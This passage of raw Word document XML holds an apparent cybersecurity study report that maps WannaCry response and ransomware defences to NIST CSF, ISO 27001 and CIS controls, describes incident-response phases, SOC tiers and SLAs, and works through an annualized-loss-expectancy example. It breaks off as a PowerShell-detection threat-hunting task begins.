learned</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Real-time adaptation; threat intelligence integrated</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">WannaCry Ransomware Mapped to NIST CSF</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2960"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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NIST Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4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in WannaCry Response</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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 Control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IDENTIFY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Catalog all Windows systems; identify unpatched SMBv1-enabled hosts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ID.AM-1: Physical devices inventoried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PROTECT</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Apply MS17-010 patch; disable SMBv1; block port 445 at perimeter</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PR.IP-12: Vulnerability management plan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DETECT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Monitor for EternalBlue exploit signatures; alert on SMB scanning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DE.CM-1: Network monitored for events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RESPOND</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Isolate infected machines; activate IR playbook; notify stakeholders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RS.RP-1: Response plan executed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RECOVER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Restore encrypted files from verified offline backups; validate clean state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RC.RP-1: Recovery plan executed</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">2.2 ISO 27001 Controls</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">ISO 27001 is an international standard for Information Security Management Systems (ISMS). Annex A defines 114 controls across 14 domains that organizations can implement to manage information security risks.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4160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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Control ID</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Control Name</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Ransomware Application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A.8.2.1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Asset Management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Classification of Information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Identify and label critical data requiring extra protection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A.12.3.1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Operations Security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Information Backup</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3-2-1 backup rule: restore capability after ransomware encryption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A.12.4.1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Operations Security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Event Logging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Log file access patterns; detect anomalous encryption activity early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A.12.6.1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Operations Security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Management of Technical Vulnerabilities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Patch EternalBlue, Log4Shell and other exploited CVEs promptly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A.14.2.1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System Development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Secure Development Policy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Prevent vulnerable software from shipping to production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A.16.1.1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Incident Management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Responsibilities and Procedures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Execute documented IR playbook upon ransomware detection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A.17.1.1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Business Continuity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Planning Information Security Continuity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BCP ensures operations continue during ransomware incident</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">CIS Controls vs NIST CSF Cross-Reference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600"/>
        <w:gridCol w:w="3160"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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CIS Control #</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CIS Control Name</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Maps to NIST CSF Function</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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CIS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Inventory of Enterprise Assets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IDENTIFY — ID.AM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Know what you have before you protect it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CIS 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Inventory of Software Assets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IDENTIFY — ID.AM</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Unauthorized software = attack surface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CIS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Data Protection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PROTECT — PR.DS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Classify, encrypt, and control sensitive data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CIS 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Secure Configuration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PROTECT — PR.IP</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Hardened baselines reduce attack surface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CIS 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Access Control Management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PROTECT — PR.AC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MFA and least privilege implementation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CIS 8</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Audit Log Management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DETECT — DE.CM</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Centralized logging enables threat detection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CIS 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Network Monitoring and Defense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DETECT — DE.CM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SIEM, IDS/IPS for network visibility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CIS 17</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Incident Response Management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RESPOND — RS.RP</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Formal IR plan with defined roles</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Incident Response Fundamentals</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Response (IR) is a structured approach to handling security incidents. The SANS IR lifecycle provides a proven six-phase model adopted by SOCs worldwide.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000"/>
        <w:gridCol w:w="3060"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>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Activities</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Key Tools</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="30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1 — Preparation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Build IR team; create playbooks; deploy detection tools; train staff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Wazuh, Velociraptor, SIEM</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IR Plan document; Runbooks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2 — Detection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Monitor alerts; analyze logs; triage events; determine if real incident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Elastic SIEM, Suricata</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Incident ticket with severity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3 — Containment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Isolate affected systems; block IPs; preserve evidence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CrowdSec, firewall, EDR</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Containment report; evidence chain-of-custody</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4 — Eradication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Remove malware; patch vulnerability; reset credentials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EDR, AV, patching tools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Clean system verification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5 — Recovery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Restore systems from backup; monitor for recurrence; validate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Backup systems, monitoring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Recovery confirmation</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6 — Lessons Learned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Document findings; update playbooks; report to stakeholders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Google Docs, Confluence</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Post-Incident Report</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">SOC Tier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3900"/>
        <w:gridCol w:w="2660"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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3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Responsibilities</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="26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Escalation Trigger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Tier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SOC Analyst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Alert triage, false positive filtering, initial investigation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Alert confirmed as real incident</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Tier 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Senior Analyst</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Deep forensic investigation, threat hunting, malware analysis</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Critical incident or complex attack chain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Tier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IR Engineer / Threat Hunter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Full IR lifecycle, reverse engineering, APT hunting</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Nation-state level threat or major breach</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Management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CISO / Management</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Executive communications, regulatory reporting, decisions</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Legal exposure or regulatory notification required</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Incident Prioritization (SLA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500"/>
        <w:gridCol w:w="2860"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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3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Criteria</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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 SLA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Critical</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="35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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Active breach, data exfiltration in progress, ransomware spreading</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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color w:val="2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">15 minutes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P2</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">High</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Malware detected, C2 communication established, account compromise</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="28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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">1 hour</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">P3</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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Medium</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Suspicious activity, policy violation, failed brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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2F2F2F"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">4 hours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Low</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Minor anomaly, informational alert, single failed login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24 hours</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">4. Risk Management Advanced Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.1 Quantitative vs Qualitative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3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Quantitative</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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Qualitative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Measurement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Numerical values (dollars, percentages)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Descriptive (High / Medium / Low)</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Formula</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ALE = SLE × ARO</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Risk Matrix: Likelihood ×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Precision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High — specific financial impact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Low-Medium — relative comparison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Use Case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Financial reporting, insurance, executive briefings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Initial risk surveys, quick assessments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Time Required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High — needs historical data</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Low — expert judgment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Example Output</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"Ransomware risk = $2,000/year ALE"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"Ransomware = HIGH risk"</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.2 ALE Formula &amp; Calculation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Annualized Loss Expectancy (ALE) quantifies the expected annual cost of a risk event.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">FORMULAS:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  SLE  =  Asset Value (AV) × Exposure Factor (EF)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ALE  =  SLE × ARO</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">RANSOMWARE SCENARIO:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Asset Value (AV)          = $50,000  (server + data value)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  Exposure Factor (EF)      =    0.20  (20% of asset destroyed per incident)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  SLE                       = $50,000 × 0.20  =  $10,000</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ARO                       =    0.20  (once every 5 years)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  ALE = $10,000 × 0.20  =  $2,000 per year</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">INTERPRETATION: Spend up to $2,000/year on controls for break-even ROI.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1E1E1E" w:val="clear"/>
        <w:spacing w:after="0" w:before="0"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="98FB98"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">Spending less = net positive; spending more = cost exceeds risk.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">4.3 Business Impact Analysis (BIA)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500"/>
        <w:gridCol w:w="2860"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1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BIA Metric</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Full Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="3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c>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2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Recovery Time Objective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Maximum acceptable downtime before business impact is critical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RTO = 4 hours for e-commerce platform</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RPO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Recovery Point Objective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Maximum acceptable data loss measured in time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RPO = 1 hour means restore to backup from ≤1 hour ago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MTTR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Mean Time to Recovery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Average time to restore a system after failure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MTTR = 6 hours based on last 12 incidents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MTBF</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Mean Time Between Failures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Average operational time between incidents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MTBF = 730 hours = roughly monthly failures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300"/>
              <w:bottom w:type="dxa" w:w="160"/>
              <w:right w:type="dxa" w:w="300"/>
            </w:tcMar>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="32"/>
                <w:szCs w:val="32"/>
              </w:rPr>
              <w:t xml:space="preserve">PART B: PRACTICAL APPLICATION</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="100"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="2E75B6" w:sz="8" w:space="4"/>
        </w:pBdr>
        <w:spacing w:before="360" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1F3864"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1: Threat Hunting with Open-Source Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tools: Elastic Security, Security Onion, Sigma Rules | Objective: Detect suspicious PowerShell activity using custom Sigma rules and Elastic SIEM queries.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:spacing w:before="280" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="2E75B6"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Sigma Rule — Suspicious PowerShell Detection</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="120" w:before="0"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
          <w:b w:val="false"/>
          <w:bCs w:val="false"/>
          <w:i w:val="false"/>
          <w:iCs w:val="false"/>
          <w:color w:val="2F2F2F"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The following Sigma rule detects suspicious PowerShell execution patterns associated with MITRE ATT&amp;CK technique T1059.001. File saved to: workflow/sigma_rule_powershell.yml</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
